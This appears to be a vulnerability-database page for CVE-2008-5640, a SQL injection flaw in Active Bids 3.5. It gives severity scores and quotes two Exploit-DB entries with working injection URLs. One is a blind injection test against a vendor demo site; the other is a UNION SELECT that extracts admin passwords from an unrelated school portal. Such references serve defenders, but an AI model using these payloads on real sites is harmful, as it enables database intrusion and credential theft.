CVE-2008-5640
published 2008-12-17CVE-2008-5640: SQL injection vulnerability in bidhistory.asp in Active Bids 3.5 allows remote attackers to execute arbitrary SQL commands via the ItemID parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.20%
64.2th percentile
SQL injection vulnerability in bidhistory.asp in Active Bids 3.5 allows remote attackers to execute arbitrary SQL commands via the ItemID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| activewebsoftwares | active_bids | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Active Bids 3.5 - 'itemID' Blind SQL Injection
exploitdb·2008-11-29
CVE-2008-5640 Active Bids 3.5 - 'itemID' Blind SQL Injection
Active Bids 3.5 - 'itemID' Blind SQL Injection
---
[~]Tybe : Remote Blind SQL Injection Vulnerability
[~]Vendor : www.activewebsoftwares.com
[~]Software : Active Bids
[~]author : Mountassif Moad
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0
Demo :
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0
# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
# milw0rm.com [2008-11-29]
Exploit-DB
Ayco Okul Portali - 'linkid' SQL Injection
exploitdb·2008-10-10
CVE-2008-4574 Ayco Okul Portali - 'linkid' SQL Injection
Ayco Okul Portali - 'linkid' SQL Injection
---
Author : By Crackers_Child
Contact: [email protected]
Greetz : milw0rm.com & tryag.cc & All My Friends
Note : Siz Pekeke Denen itler ; Siz ne turk ne de kurt olabilirsiniz. Siz Dupe Duz OROSPU cocuklarisiniz !
Script : Ayco Okul Portali (tr) Sql injection Vulnerability
http://www.aspindir.com/goster/5640
Price : 100 €
Exploit : default.asp?tip=sollinkicerik&linkid=1+union+select+0,password,username,3+from+admin
N0te : Zeh1r Oluyor G€c€l€r 1nan Uyuyam1yorum !
# milw0rm.com [2008-10-10]
No writeups or analysis indexed.
http://secunia.com/advisories/32920http://securityreason.com/securityalert/4776http://www.securityfocus.com/bid/32544http://www.vupen.com/english/advisories/2008/3302https://exchange.xforce.ibmcloud.com/vulnerabilities/46912https://www.exploit-db.com/exploits/7290http://secunia.com/advisories/32920http://securityreason.com/securityalert/4776http://www.securityfocus.com/bid/32544http://www.vupen.com/english/advisories/2008/3302https://exchange.xforce.ibmcloud.com/vulnerabilities/46912https://www.exploit-db.com/exploits/7290
2008-12-17
Published